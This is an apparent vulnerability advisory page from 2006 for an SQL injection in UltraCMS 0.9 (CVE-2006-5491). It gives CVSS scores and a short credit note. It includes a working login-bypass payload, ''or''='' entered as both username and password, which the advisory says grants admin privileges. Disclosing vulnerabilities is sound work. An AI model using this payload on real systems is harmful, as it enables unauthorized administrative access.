UltraCMS 0.9 sql injection

2006.10.26

Credit: fireboy

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2006-5491

CWE: CWE-Other

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

****************************
* Tunis the 18 October 2006*
* bug found by fireboy     *
****************************
product:UltraCMS 0.9

there is an sql injection problem in UltraCMS 0.9 and it can be exploited to gain admin privileges.

exploit:
user: 'or''='
pass: 'or''='

example : http://www.target.com/include/index.php

thx

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

UltraCMS 0.9 sql injection

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

UltraCMS 0.9 sql injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.